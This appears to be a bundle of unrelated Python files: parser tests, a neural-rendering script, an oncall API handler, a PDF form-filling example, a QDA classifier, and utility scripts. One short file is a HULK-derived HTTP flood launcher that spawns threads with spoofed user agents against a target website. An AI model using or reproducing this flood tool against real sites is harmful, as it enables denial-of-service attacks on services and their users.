'surname': 'Surname 3',
'name': 'Name 3'},
])
def test_contacts_with_none_entries(self):
csv_file = self.fixture('sample-contacts-with-headers-and-none.csv')
fp = default_storage.open(csv_file, 'rU')
contacts = list(self.parser.parse_file(fp, zip(
['name', 'surname', 'msisdn'],
['string', 'string', 'msisdn_za']), has_header=True))
self.assertEqual(contacts, [
{
'msisdn': '+27761234561',
'name': 'Name 1'},
{
'msisdn': '+27761234562',
'name': 'Name 2'},
{
'msisdn': '+27761234563',
'surname': 'Surname 3',
'name': 'Name 3'},
])
def test_contacts_with_missing_fields(self):
csv_file = self.fixture(
'sample-contacts-with-headers-and-missing-fields.csv')
fp = default_storage.open(csv_file, 'rU')
contacts_iter = self.parser.parse_file(fp, zip(
['name', 'surname', 'msisdn'],
['string', 'string', 'msisdn_za']), has_header=True)
contacts = []
try:
for contact in contacts_iter:
if contact['name'] == 'Extra rows':
# We don't care about these rows.
continue
contacts.append(contact)
except ContactParserException as err:
self.assertEqual(err.args[0], 'Invalid row: not enough fields.')
self.assertEqual(contacts, [{
'msisdn': '+27761234561',
'surname': 'Surname 1',
'name': 'Name 1',
}])
def test_contacts_with_extra_fields(self):
csv_file = self.fixture(
'sample-contacts-with-headers-and-extra-fields.csv')
fp = default_storage.open(csv_file, 'rU')
contacts_iter = self.parser.parse_file(fp, zip(
['name', 'surname', 'msisdn'],
['string', 'string', 'msisdn_za']), has_header=True)
contacts = []
try:
for contact in contacts_iter:
if contact['name'] == 'Extra rows':
# We don't care about these rows.
continue
contacts.append(contact)
except ContactParserException as err:
self.assertEqual(err.args[0], 'Invalid row: too many fields.')
self.assertEqual(contacts, [{
'msisdn': '+27761234561',
'surname': 'Surname 1',
'name': 'Name 1',
}])
class TestXLSParser(ParserTestCase):
PARSER_CLASS = XLSFileParser
def test_guess_headers_and_row_without_headers(self):
xls_file = self.fixture('sample-contacts.xls')
data = self.parser.guess_headers_and_row(xls_file)
has_headers, known_headers, sample_row = data
self.assertFalse(has_headers)
self.assertEqual(known_headers, self.parser.DEFAULT_HEADERS)
def test_guess_headers_and_row_with_headers(self):
xls_file = self.fixture('sample-contacts-with-headers.xlsx')
data = self.parser.guess_headers_and_row(xls_file)
has_headers, known_headers, sample_row = data
self.assertTrue(has_headers)
self.assertTrue('mathare-kiamaiko' in known_headers)
self.assertTrue('baba dogo' in known_headers)
self.assertTrue('mathare-kiamaiko' in sample_row)
self.assertTrue('baba dogo' in sample_row)
def test_contacts_parsing(self):
xls_file = self.fixture('sample-contacts-with-headers.xlsx')
contacts = list(self.parser.parse_file(xls_file, zip(
['name', 'surname', 'msisdn'],
['string', 'integer', 'number']), has_header=True))
self.assertEqual(contacts[0], {
'msisdn': '1.0',
'surname': '2',
'name': 'xxx'})
|
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from torch.utils.data import Dataset
import sys
sys.path.append('../')
from torch.utils.data import DataLoader
import imageio
from config import config_parser
from ibrnet.sample_ray import RaySamplerSingleImage
from ibrnet.render_image import render_single_image
from ibrnet.model import IBRNetModel
from utils import *
from ibrnet.projection import Projector
from ibrnet.data_loaders import get_nearest_pose_ids
from ibrnet.data_loaders.llff_data_utils import load_llff_data, batch_parse_llff_poses
import time
class LLFFRenderDataset(Dataset):
def __init__(self, args,
scenes='fern', # 'fern', 'flower', 'fortress', 'horns', 'leaves', 'orchids', 'room', 'trex'
**kwargs):
self.folder_path = os.path.join(args.rootdir, 'data/nerf_llff_data/')
self.num_source_views = args.num_source_views
print("loading {} for rendering".format(scenes))
self.render_rgb_files = []
self.render_intrinsics = []
self.render_poses = []
self.render_train_set_ids = []
self.render_depth_range = []
self.h = []
self.w = []
self.train_intrinsics = []
self.train_poses = []
self.train_rgb_files = []
for i, scene in enumerate(scenes):
scene_path = os.path.join(self.folder_path, scene)
_, poses, bds, render_poses, i_test, rgb_files = load_llff_data(scene_path, load_imgs=False, factor=4)
near_depth = np.min(bds)
far_depth = np.max(bds)
intrinsics, c2w_mats = batch_parse_llff_poses(poses)
h, w = poses[0][:2, -1]
render_intrinsics, render_c2w_mats = batch_parse_llff_poses(render_poses)
i_test = [i_test]
i_val = i_test
i_train = np.array([i for i in np.arange(len(rgb_files)) if
(i not in i_test and i not in i_val)])
self.train_intrinsics.append(intrinsics[i_train])
self.train_poses.append(c2w_mats[i_train])
self.train_rgb_files.append(np.array(rgb_files)[i_train].tolist())
num_render = len(render_intrinsics)
self.render_intrinsics.extend([intrinsics_ for intrinsics_ in render_intrinsics])
self.render_poses.extend([c2w_mat for c2w_mat in render_c2w_mats])
self.render_depth_range.extend([[near_depth, far_depth]]*num_render)
self.render_train_set_ids.extend([i]*num_render)
self.h.extend([int(h)]*num_render)
self.w.extend([int(w)]*num_render)
def __len__(self):
return len(self.render_poses)
def __getitem__(self, idx):
render_pose = self.render_poses[idx]
intrinsics = self.render_intrinsics[idx]
depth_range = self.render_depth_range[idx]
train_set_id = self.render_train_set_ids[idx]
train_rgb_files = self.train_rgb_files[train_set_id]
train_poses = self.train_poses[train_set_id]
train_intrinsics = self.train_intrinsics[train_set_id]
h, w = self.h[idx], self.w[idx]
camera = np.concatenate(([h, w], intrinsics.flatten(),
render_pose.flatten())).astype(np.float32)
id_render = -1
nearest_pose_ids = get_nearest_pose_ids(render_pose,
train_poses,
self.num_source_views,
tar_id=id_render,
angular_dist_method='dist')
src_rgbs = []
src_cameras = []
for id in nearest_pose_ids:
src_rgb = imageio.imread(train_rgb_files[id]).astype(np.float32) / 255.
train_pose = train_poses[id]
train_intrinsics_ = train_intrinsics[id]
src_rgbs.append(src_rgb)
img_size = src_rgb.shape[:2]
src_camera = np.concatenate((list(img_size), train_intrinsics_.flatten(),
train_pose.flatten())).astype(np.float32)
src_cameras.append(src_camera)
src_rgbs = np.stack(src_rgbs, axis=0)
src_cameras = np.stack(src_cameras, axis=0)
depth_range = torch.tensor([depth_range[0] * 0.9, depth_range[1] * 1.5])
return {'camera': torch.from_numpy(camera),
'rgb_path': '',
'src_rgbs': torch.from_numpy(src_rgbs[..., :3]),
'src_cameras': torch.from_numpy(src_cameras),
'depth_range': depth_range
}
if __name__ == '__main__':
parser = config_parser()
args = parser.parse_args()
args.distributed = False
# Create ibrnet model
model = IBRNetModel(args, load_scheduler=False, load_opt=False)
eval_dataset_name = args.eval_dataset
extra_out_dir = '{}/{}'.format(eval_dataset_name, args.expname)
print('saving results to {}...'.format(extra_out_dir))
os.makedirs(extra_out_dir, exist_ok=True)
projector = Projector(device='cuda:0')
assert len(args.eval_scenes) == 1, "only accept single scene"
scene_name = args.eval_scenes[0]
out_scene_dir = os.path.join(extra_out_dir, '{}_{:06d}'.format(scene_name, model.start_step), 'videos')
print('saving results to {}'.format(out_scene_dir))
os.makedirs(out_scene_dir, exist_ok=True)
test_dataset = LLFFRenderDataset(args, scenes=args.eval_scenes)
save_prefix = scene_name
test_loader = DataLoader(test_dataset, batch_size=1)
total_num = len(test_loader)
out_frames = []
crop_ratio = 0.075
for i, data in enumerate(test_loader):
start = time.time()
src_rgbs = data['src_rgbs'][0].cpu().numpy()
averaged_img = (np.mean(src_rgbs, axis=0) * 255.).astype(np.uint8)
imageio.imwrite(os.path.join(out_scene_dir, '{}_average.png'.format(i)), averaged_img)
model.switch_to_eval()
with torch.no_grad():
ray_sampler = RaySamplerSingleImage(data, device='cuda:0')
ray_batch = ray_sampler.get_all()
featmaps = model.feature_net(ray_batch['src_rgbs'].squeeze(0).permute(0, 3, 1, 2))
ret = render_single_image(ray_sampler=ray_sampler,
ray_batch=ray_batch,
model=model,
projector=projector,
chunk_size=args.chunk_size,
det=True,
N_samples=args.N_samples,
inv_uniform=args.inv_uniform,
N_importance=args.N_importance,
white_bkgd=args.white_bkgd,
featmaps=featmaps)
torch.cuda.empty_cache()
coarse_pred_rgb = ret['outputs_coarse']['rgb'].detach().cpu()
coarse_pred_rgb = (255 * np.clip(coarse_pred_rgb.numpy(), a_min=0, a_max=1.)).astype(np.uint8)
imageio.imwrite(os.path.join(out_scene_dir, '{}_pred_coarse.png'.format(i)), coarse_pred_rgb)
coarse_pred_depth = ret['outputs_coarse']['depth'].detach().cpu()
imageio.imwrite(os.path.join(out_scene_dir, '{}_depth_coarse.png'.format(i)),
(coarse_pred_depth.numpy().squeeze() * 1000.).astype(np.uint16))
coarse_pred_depth_colored = colorize_np(coarse_pred_depth,
range=tuple(data['depth_range'].squeeze().numpy()))
imageio.imwrite(os.path.join(out_scene_dir, '{}_depth_vis_coarse.png'.format(i)),
(255 * coarse_pred_depth_colored).astype(np.uint8))
coarse_acc_map = torch.sum(ret['outputs_coarse']['weights'].detach().cpu(), dim=-1)
coarse_acc_map_colored = (colorize_np(coarse_acc_map, range=(0., 1.)) * 255).astype(np.uint8)
imageio.imwrite(os.path.join(out_scene_dir, '{}_acc_map_coarse.png'.format(i)),
coarse_acc_map_colored)
if ret['outputs_fine'] is not None:
fine_pred_rgb = ret['outputs_fine']['rgb'].detach().cpu()
fine_pred_rgb = (255 * np.clip(fine_pred_rgb.numpy(), a_min=0, a_max=1.)).astype(np.uint8)
imageio.imwrite(os.path.join(out_scene_dir, '{}_pred_fine.png'.format(i)), fine_pred_rgb)
fine_pred_depth = ret['outputs_fine']['depth'].detach().cpu()
imageio.imwrite(os.path.join(out_scene_dir, '{}_depth_fine.png'.format(i)),
(fine_pred_depth.numpy().squeeze() * 1000.).astype(np.uint16))
fine_pred_depth_colored = colorize_np(fine_pred_depth,
range=tuple(data['depth_range'].squeeze().cpu().numpy()))
imageio.imwrite(os.path.join(out_scene_dir, '{}_depth_vis_fine.png'.format(i)),
(255 * fine_pred_depth_colored).astype(np.uint8))
fine_acc_map = torch.sum(ret['outputs_fine']['weights'].detach().cpu(), dim=-1)
fine_acc_map_colored = (colorize_np(fine_acc_map, range=(0., 1.)) * 255).astype(np.uint8)
imageio.imwrite(os.path.join(out_scene_dir, '{}_acc_map_fine.png'.format(i)),
fine_acc_map_colored)
else:
fine_pred_rgb = None
out_frame = fine_pred_rgb if fine_pred_rgb is not None else coarse_pred_rgb
h, w = averaged_img.shape[:2]
crop_h = int(h * crop_ratio)
crop_w = int(w * crop_ratio)
# crop out image boundaries
out_frame = out_frame[crop_h:h - crop_h, crop_w:w - crop_w, :]
out_frames.append(out_frame)
print('frame {} completed, {}'.format(i, time.time() - start))
imageio.mimwrite(os.path.join(extra_out_dir, '{}.mp4'.format(scene_name)), out_frames, fps=30, quality=8)
|
"""
HTTP UNBEARBALE LOAD QUEEN
A HULK EDIT BY @OBN0XIOUS
THE ORIGINAL MAKER OF HULK PLEASE GO BACK TO CODECADEMY
"""
import sys
import argparse
import random
from threading import Thread
import hulqThreading
import hulqRequest
parser = argparse.ArgumentParser()
parser.add_argument('--threads', '-t', default=2, help='Choose how many threads.')
parser.add_argument('--website', '-w', help='Website you are attacking.')
systemArguments = parser.parse_args()
if not systemArguments.website:
sys.exit("Provide -w or --website.")
userAgents = \
(
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3 Gecko/20090913 Firefox/3.5.3', \
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3 Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729', \
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3 Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729', \
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1 Gecko/20090718 Firefox/3.5.1', \
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US AppleWebKit/532.1 (KHTML, \ like Gecko Chrome/4.0.219.6 Safari/532.1', \
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2', \
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729', \
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0', \
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2', \
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US', \
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP', \
'Opera/9.80 (Windows NT 5.2; U; ru Presto/2.5.22 Version/10.51'
)
referers = \
(
'http://www.google.com/?q=', \
'http://www.usatoday.com/search/results?q=', \
'http://engadget.search.aol.com/search?q='
)
for i in range(0, int(systemArguments.threads)):
referer = random.choice(referers)
userAgent = random.choice(userAgents)
t1 = Thread(target = hulqRequest.httpAttackRequest, args = (systemArguments.website, userAgent, referer))
t1.start()
|
# Copyright (c) LinkedIn Corporation. All rights reserved. Licensed under the BSD-2 Clause license.
# See LICENSE in the project root for license information.
import json
import time
from .events import on_get as get_events
from collections import defaultdict
import requests
from ujson import dumps as json_dumps
from falcon import HTTPStatus, HTTP_200
class PaidEvents(object):
def __init__(self, config):
self.config = config
def on_get(self, req, resp):
"""
Search for events. Allows filtering based on a number of parameters,
detailed below. Also returns only the users who are paid to be on call. Uses response from
oncall-bonus to identify paid status.
**Example request**:
.. sourcecode:: http
GET /api/v0/oncall_events?team=foo-sre&end__gt=1487466146&role=primary HTTP/1.1
Host: example.com
**Example response**:
.. sourcecode:: http
HTTP/1.1 200 OK
Content-Type: application/json
{
"ldap_user_id":
[
{
"start": 1488441600,
"end": 1489132800,
"team": "foo-sre",
"link_id": null,
"schedule_id": null,
"role": "primary",
"user": "foo",
"full_name": "Foo Icecream",
"id": 187795
},
{
"start": 1488441600,
"end": 1489132800,
"team": "foo-sre",
"link_id": "8a8ae77b8c52448db60c8a701e7bffc2",
"schedule_id": 123,
"role": "primary",
"user": "bar",
"full_name": "Bar Apple",
"id": 187795
}
]
]
:query team: team name
:query user: user name
:query role: role name
:query id: id of the event
:query start: start time (unix timestamp) of event
:query end: end time (unix timestamp) of event
:query start__gt: start time (unix timestamp) greater than
:query start__ge: start time (unix timestamp) greater than or equal
:query start__lt: start time (unix timestamp) less than
:query start__le: start time (unix timestamp) less than or equal
:query end__gt: end time (unix timestamp) greater than
:query end__ge: end time (unix timestamp) greater than or equal
:query end__lt: end time (unix timestamp) less than
:query end__le: end time (unix timestamp) less than or equal
:query role__eq: role name
:query role__contains: role name contains param
:query role__startswith: role name starts with param
:query role__endswith: role name ends with param
:query team__eq: team name
:query team__contains: team name contains param
:query team__startswith: team name starts with param
:query team__endswith: team name ends with param
:query team_id: team id
:query user__eq: user name
:query user__contains: user name contains param
:query user__startswith: user name starts with param
:query user__endswith: user name ends with param
:statuscode 200: no error
:statuscode 400: bad request
"""
config = self.config
oncall_bonus_blacklist = config.get('bonus_blacklist', [])
oncall_bonus_whitelist = config.get('bonus_whitelist', [])
bonus_url = config.get('bonus_url', None)
ldap_grouping = defaultdict(list)
# if start time is not specified only fetch events in the future
if not req.params.get('start__gt'):
req.params['start__gt'] = str(int(time.time()))
get_events(req, resp)
# fetch team data from an externall oncall-bonus api
try:
bonus_response = requests.get(bonus_url)
bonus_response.raise_for_status()
except requests.exceptions.RequestException:
raise HTTPStatus('503 failed to contact oncall-bonus API')
oncall_bonus_teams = bonus_response.json()
for event in json.loads(resp.body):
if event['role'].lower() == 'manager':
continue
team = event['team']
if team in oncall_bonus_whitelist:
ldap_grouping[event['user']].append(event)
continue
if team in oncall_bonus_blacklist:
continue
# check if event's role is payed for that team
team_payment_details = next((item for item in oncall_bonus_teams if item.get('name', '') == team), None)
if team_payment_details:
team_payed_roles = {'primary': team_payment_details.get('primary_paid', 0), 'secondary': team_payment_details.get('secondary_paid', 0)}
if team_payed_roles.get(event['role']):
ldap_grouping[event['user']].append(event)
resp.status = HTTP_200
resp.body = json_dumps(ldap_grouping)
|
import os
import requests # pip install requests
# The authentication key (API Key).
# Get your own by registering at https://app.pdf.co/documentation/api
API_KEY = "**********************************************"
# Base URL for PDF.co Web API requests
BASE_URL = "https://api.pdf.co/v1"
# Direct URL of source PDF file.
SourceFileUrl = "https://bytescout-com.s3-us-west-2.amazonaws.com/files/demo-files/cloud-api/pdf-form/f1040.pdf"
# PDF document password. Leave empty for unprotected documents.
Password = ""
# Destination PDF file name
DestinationFile = ".\\result.pdf"
# Runs processing asynchronously. Returns Use JobId that you may use with /job/check to check state of the processing (possible states: working, failed, aborted and success). Must be one of: true, false.
Async = "False"
# Values to fill out pdf fields with built-in pdf form filler.
# To fill fields in PDF form, use the following format page;fieldName;value for example: 0;editbox1;text is here. To fill checkbox, use true, for example: 0;checkbox1;true. To separate multiple objects, use | separator. To get the list of all fillable fields in PDF form please use /pdf/info/fields endpoint.
FieldsStrings = "1;topmostSubform[0].Page1[0].f1_02[0];John A. Doe|1;topmostSubform[0].Page1[0].FilingStatus[0].c1_01[1];true|1;topmostSubform[0].Page1[0].YourSocial_ReadOrderControl[0].f1_04[0];123456789"
def main(args = None):
fillPDFForm(SourceFileUrl, DestinationFile)
def fillPDFForm(uploadedFileUrl, destinationFile):
"""Converts HTML to PDF using PDF.co Web API"""
# Prepare requests params as JSON
# See documentation: https://apidocs.pdf.co
parameters = {}
parameters["name"] = os.path.basename(destinationFile)
parameters["url"] = uploadedFileUrl
parameters["fieldsString"] = FieldsStrings
parameters["async"] = Async
# Prepare URL for 'Fill PDF' API request
url = "{}/pdf/edit/add".format(BASE_URL)
# Execute request and get response as JSON
response = requests.post(url, data=parameters, headers={ "x-api-key": API_KEY })
if (response.status_code == 200):
json = response.json()
if json["error"] == False:
# Get URL of result file
resultFileUrl = json["url"]
# Download result file
r = requests.get(resultFileUrl, stream=True)
if (r.status_code == 200):
with open(destinationFile, 'wb') as file:
for chunk in r:
file.write(chunk)
print(f"Result file saved as \"{destinationFile}\" file.")
else:
print(f"Request error: {response.status_code} {response.reason}")
else:
# Show service reported error
print(json["message"])
else:
print(f"Request error: {response.status_code} {response.reason}")
if __name__ == '__main__':
main()
|
'''Configuration file for the noise paper.'''
from __future__ import absolute_import, print_function
import os.path
import matplotlib.ticker as ti
from noisefigs.plotters.base import SeparateMultipageSaver
def get_config():
return _config
ROOT_DIR = ['simulation_data', 'ii_connections', 'gE_vs_gI']
_config = {
'grids_data_root': os.path.join(*(ROOT_DIR + ['grids'])),
'bump_data_root': os.path.join(*(ROOT_DIR + ['gamma_bump'])),
'vel_data_root': os.path.join(*(ROOT_DIR + ['velocity'])),
'const_pos_data_root': None,
'singleDataRoot': None,
'GridExampleRectPlotter': {
'fig_saver': SeparateMultipageSaver(None, 'pdf')
},
'GridSweepsPlotter': {
'scale_factor': .9,
'cbar': [1, 0, 0],
'cbar_kw': {
'label': 'Gridness score',
'fraction': 0.25,
'location': 'left',
'shrink': 0.8,
'pad': .2,
'labelpad': 8,
'ticks': ti.MultipleLocator(0.5),
'rasterized': True
},
'ann': None,
},
'MainBumpFormationPlotter': {
},
'GammaSweepsPlotter': {
'F_vmin': 30,
'F_vmax': 167,
},
'GammaExamplePlotter': {
'yscale_kw': [[
dict(
scaleLen=3,
unitsText='nA',
x=.5, y=.1,
size='x-small'
),
dict(
scaleLen=0.5,
unitsText='nA',
x=.5, y=.01,
size='x-small'
),
dict(
scaleLen=0.5,
unitsText='nA',
x=.5, y=-.1,
size='x-small'
)],
[dict(
scaleLen=5,
unitsText='nA',
x=.5, y=.01,
size='x-small'
),
dict(
scaleLen=0.5,
unitsText='nA',
x=.5, y=.05,
size='x-small'
),
dict(
scaleLen=0.5,
unitsText='nA',
x=.55, y=0,
size='x-small'
)]],
},
'MaxPopulationFRSweepsPlotter': {
},
'PSeizureSweepPlotter': {
'FRThreshold': 300,
},
'BumpDriftAtTimePlotter': {
},
'VelFitErrSweepPlotter': {
'vmin': 0.1,
'vmax': 12.101,
},
'VelFitStdSweepPlotter': {
},
'VelSlopeSweepPlotter': {
'vmin': -.6,
'vmax': 1.64,
},
}
|
import os
import os.path
import subprocess
import sys
from PIL import Image
LISTF = "_list.txt"
def get_dimensions(fpath):
#print(fpath)
return Image.open(fpath).size
def run(folder, outfile, framerate=30, outres=(1920,1080)):
jpglist = [os.path.join(folder, f) for f in os.listdir(folder) if f.startswith("frame_")]
dimen = get_dimensions(jpglist[0])
ratio = float(outres[1])/outres[0]
if dimen[0]*ratio < dimen[1]:
crop = (dimen[0], int(dimen[0]*ratio))
else:
crop = (int(dimen[1]/ratio), dimen[1])
with open(LISTF, "w") as ltxt:
for f in jpglist:
ltxt.write("file '"+f+"'\n")
fsel_args = ["-f", "concat", "-i", LISTF]
rs_str = "".join(("crop=", str(crop[0]), ":", str(crop[1]),":0:0,scale=",str(outres[0]),":",str(outres[1])))
enc_flags = ["-pix_fmt", "yuv420p", "-preset", "veryslow", "-crf", "18"]
args_final = ["ffmpeg", "-r", str(framerate)] + fsel_args + ["-vf", rs_str] + enc_flags + [outfile]
print(" ".join(args_final))
subprocess.call(args_final)
os.remove(LISTF)
if __name__=="__main__":
jpglist = [os.path.join(sys.argv[1], f) for f in os.listdir(sys.argv[1]) if f.startswith("frame_")]
dimen = get_dimensions(jpglist[0])
dimen = (dimen[0] if dimen[0]%2==0 else dimen[0]-1, dimen[1] if dimen[1]%2==0 else dimen[1]-1)
run(sys.argv[1], sys.argv[2], outres=dimen)
|
"""
Quadratic Discriminant Analysis
"""
# Author: Matthieu Perrot <[email protected]>
#
# License: BSD Style.
import warnings
import numpy as np
import scipy.ndimage as ndimage
from .base import BaseEstimator, ClassifierMixin
# FIXME :
# - in fit(X, y) method, many checks are common with other models
# (in particular LDA model) and should be factorized:
# maybe in BaseEstimator ?
class QDA(BaseEstimator, ClassifierMixin):
"""
Quadratic Discriminant Analysis (QDA)
Parameters
----------
X : array-like, shape = [n_samples, n_features]
Training vector, where n_samples in the number of samples and
n_features is the number of features.
y : array, shape = [n_samples]
Target vector relative to X
priors : array, optional, shape = [n_classes]
Priors on classes
Attributes
----------
`means_` : array-like, shape = [n_classes, n_features]
Class means
`priors_` : array-like, shape = [n_classes]
Class priors (sum to 1)
`covariances_` : list of array-like, shape = [n_features, n_features]
Covariance matrices of each class
Examples
--------
>>> from sklearn.qda import QDA
>>> import numpy as np
>>> X = np.array([[-1, -1], [-2, -1], [-3, -2], [1, 1], [2, 1], [3, 2]])
>>> y = np.array([1, 1, 1, 2, 2, 2])
>>> clf = QDA()
>>> clf.fit(X, y)
QDA(priors=None)
>>> print clf.predict([[-0.8, -1]])
[1]
See also
--------
LDA
"""
def __init__(self, priors=None):
self.priors = np.asarray(priors) if priors is not None else None
def fit(self, X, y, store_covariances=False, tol=1.0e-4):
"""
Fit the QDA model according to the given training data and parameters.
Parameters
----------
X : array-like, shape = [n_samples, n_features]
Training vector, where n_samples in the number of samples and
n_features is the number of features.
y : array, shape = [n_samples]
Target values (integers)
store_covariances : boolean
If True the covariance matrices are computed and stored in the
self.covariances_ attribute.
"""
X = np.asarray(X)
y = np.asarray(y)
if X.ndim != 2:
raise ValueError('X must be a 2D array')
if X.shape[0] != y.shape[0]:
raise ValueError(
'Incompatible shapes: X has %s samples, while y '
'has %s' % (X.shape[0], y.shape[0]))
if y.dtype.char.lower() not in ('b', 'h', 'i'):
# We need integer values to be able to use
# ndimage.measurements and np.bincount on numpy >= 2.0.
# We currently support (u)int8, (u)int16 and (u)int32.
# Note that versions of scipy >= 0.8 can also accept
# (u)int64. We however don't support it for backwards
# compatibility.
y = y.astype(np.int32)
n_samples, n_features = X.shape
classes = np.unique(y)
n_classes = classes.size
if n_classes < 2:
raise ValueError('y has less than 2 classes')
classes_indices = [(y == c).ravel() for c in classes]
if self.priors is None:
counts = np.array(ndimage.measurements.sum(
np.ones(n_samples, dtype=y.dtype), y, index=classes))
self.priors_ = counts / float(n_samples)
else:
self.priors_ = self.priors
cov = None
if store_covariances:
cov = []
means = []
scalings = []
rotations = []
for group_indices in classes_indices:
Xg = X[group_indices, :]
meang = Xg.mean(0)
means.append(meang)
Xgc = Xg - meang
# Xgc = U * S * V.T
U, S, Vt = np.linalg.svd(Xgc, full_matrices=False)
rank = np.sum(S > tol)
if rank < n_features:
warnings.warn("Variables are collinear")
S2 = (S ** 2) / (len(Xg) - 1)
if store_covariances:
# cov = V * (S^2 / (n-1)) * V.T
cov.append(np.dot(S2 * Vt.T, Vt))
scalings.append(S2)
rotations.append(Vt.T)
if store_covariances:
self.covariances_ = cov
self.means_ = np.asarray(means)
self.scalings = np.asarray(scalings)
self.rotations = rotations
self.classes = classes
return self
def decision_function(self, X):
"""Apply decision function to an array of samples.
Parameters
----------
X : array-like, shape = [n_samples, n_features]
Array of samples (test vectors).
Returns
-------
C : array, shape = [n_samples, n_classes]
Decision function values related to each class, per sample.
"""
X = np.asarray(X)
norm2 = []
for i in range(len(self.classes)):
R = self.rotations[i]
S = self.scalings[i]
Xm = X - self.means_[i]
X2 = np.dot(Xm, R * (S ** (-0.5)))
norm2.append(np.sum(X2 ** 2, 1))
norm2 = np.array(norm2).T # shape = [len(X), n_classes]
return (-0.5 * (norm2 + np.sum(np.log(self.scalings), 1))
+ np.log(self.priors_))
def predict(self, X):
"""Perform classification on an array of test vectors X.
The predicted class C for each sample in X is returned.
Parameters
----------
X : array-like, shape = [n_samples, n_features]
Returns
-------
C : array, shape = [n_samples]
"""
d = self.decision_function(X)
y_pred = self.classes[d.argmax(1)]
return y_pred
def predict_proba(self, X):
"""Return posterior probabilities of classification.
Parameters
----------
X : array-like, shape = [n_samples, n_features]
Array of samples/test vectors.
Returns
-------
C : array, shape = [n_samples, n_classes]
Posterior probabilities of classification per class.
"""
values = self.decision_function(X)
# compute the likelihood of the underlying gaussian models
# up to a multiplicative constant.
likelihood = np.exp(values - values.min(axis=1)[:, np.newaxis])
# compute posterior probabilities
return likelihood / likelihood.sum(axis=1)[:, np.newaxis]
def predict_log_proba(self, X):
"""Return posterior probabilities of classification.
Parameters
----------
X : array-like, shape = [n_samples, n_features]
Array of samples/test vectors.
Returns
-------
C : array, shape = [n_samples, n_classes]
Posterior log-probabilities of classification per class.
"""
# XXX : can do better to avoid precision overflows
probas_ = self.predict_proba(X)
return np.log(probas_)
|
import os
import codecs
import csv
from collections import namedtuple
import dateutil.parser
Record = namedtuple('Record', 'datetime url email ip')
def read_tracker_file(tracker_dir: str, the_date: str, target: str, exclude_anonymous: bool = False):
"""
:param tracker_dir:
:param the_date:
:param target: options: all, anonymous-all, anonymous-ip, user-email
:param exclude_anonymous:
:return:
"""
target_ip = None
target_email = None
if target.startswith('user'):
target_email = target.split('-')[1]
elif target.startswith('anonymous'):
target_ip = target.split('-')[1]
fname = os.path.join(tracker_dir, str(the_date) + '.dat')
if os.path.exists(fname):
fp = codecs.open(fname, 'rb', 'utf-8')
reader = csv.reader(fp)
rows = []
for row in reader:
r = Record(*row)
if r.email == 'anonymous' and r.url in ['/accounts/login/', '/accounts/logout/']:
continue
if exclude_anonymous and r.email == 'anonymous' and target_ip != 'all':
continue
if (
(target == 'all') or
(target == 'anonymous-all' and r.email == 'anonymous') or
(target_email == r.email or target_ip == r.ip)
):
rows.append(r)
fp.close()
else:
rows = []
return rows
def histogram_one_day(tracker_dir: str, the_date: str, target: str, **kwargs):
rows = read_tracker_file(tracker_dir, the_date, target, **kwargs)
if rows is None:
return None
histogram = [0]*24
for row in rows:
dt = dateutil.parser.parse(row.datetime)
histogram[dt.hour] += 1
return histogram
|
# Copyright (c) 2010-2013 Simplistix Ltd
#
# See license.txt for more details.
import re
from manuel import Document, Region, RegionContainer, Manuel
from mock import Mock
from testfixtures import compare, Comparison as C, TempDirectory
from testfixtures.manuel import Files,FileBlock,FileResult
from unittest import TestCase
class TestContainer(RegionContainer):
def __init__(self,attr,*blocks):
self.regions = []
for block in blocks:
region = Region(0,' ')
setattr(region,attr,block)
self.regions.append(region)
class TestManuel(TestCase):
def tearDown(self):
TempDirectory.cleanup_all()
def test_multiple_files(self):
d = Document("""
.. topic:: file.txt
:class: write-file
line 1
line 2
line 3
.. topic:: file2.txt
:class: read-file
line 4
line 5
line 6
""")
d.parse_with(Files('td'))
compare([
None,
C(FileBlock,
path='file.txt',
content="line 1\n\nline 2\nline 3\n",
action='write'),
C(FileBlock,
path='file2.txt',
content='line 4\n\nline 5\nline 6\n',
action='read'),
],[r.parsed for r in d])
def test_ignore_literal_blocking(self):
d = Document("""
.. topic:: file.txt
:class: write-file
::
line 1
line 2
line 3
""")
d.parse_with(Files('td'))
compare([
None,
C(FileBlock,
path='file.txt',
content="line 1\n\nline 2\nline 3\n",
action='write'),
],[r.parsed for r in d])
def test_file_followed_by_text(self):
d = Document("""
.. topic:: file.txt
:class: write-file
.. code-block:: python
print "hello"
out = 'there'
foo = 'bar'
This is just some normal text!
""")
d.parse_with(Files('td'))
compare([
None,
C(FileBlock,
path='file.txt',
content='.. code-block:: python\n\nprint "hello"'
'\nout = \'there\'\n\nfoo = \'bar\'\n',
action='write'),
None,
],[r.parsed for r in d])
def test_red_herring(self):
d = Document("""
.. topic:: file.txt
:class: not-a-file
print "hello"
out = 'there'
""")
d.parse_with(Files('td'))
compare([r.parsed for r in d],[None])
def test_no_class(self):
d = Document("""
.. topic:: file.txt
print "hello"
out = 'there'
""")
d.parse_with(Files('td'))
compare([r.parsed for r in d],[None])
def test_unclaimed_works(self):
